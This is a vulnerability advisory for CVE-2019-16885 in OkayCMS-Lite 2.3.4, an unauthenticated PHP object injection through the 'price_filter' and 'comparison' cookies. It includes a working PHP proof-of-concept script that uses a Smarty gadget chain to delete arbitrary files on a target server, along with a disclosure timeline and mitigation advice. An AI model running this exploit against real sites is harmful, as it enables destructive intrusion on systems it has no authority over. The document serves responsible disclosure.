# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in "view/ProductsView.php" using the cookie "price_filter" or in "api/Comparison.php" via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```


## Proof of Concept
The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:

```
<?php

if($argc != 3)
{
  print "usage: $argv[0] <url> <file>\n";
  exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

        public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
            $cached->is_locked = false;
            @unlink($cached->lock_id);
        }
}

class Smarty_Template_Cached {
    public $handler = null;
    public $is_locked = true;
    public $lock_id = "";

    public function __construct() {
       $this->lock_id = $GLOBALS['file'];
       $this->handler = new Smarty_Internal_CacheResource_File;
    }
}


class Smarty {
    public $cache_locking = true;
}

class Smarty_Internal_Template  {
    public $smarty = null;
    public $cached = null;

    public function __construct() {
        $this->smarty = new Smarty;
        $this->cached = new Smarty_Template_Cached;
    }

    public function __destruct(){
        if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
            $this->cached->handler->releaseLock($this->smarty, $this->cached);
        }
    }
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
  'Accept-Language: en-US,en;q=0.5',
  "Referer: $url/en/catalog/myagkie-igrushki",
  'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_HTTPHEADER => $headers,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
    CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
   print curl_error($curl);
}
curl_close($curl);


print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions
 versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References:
*  https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)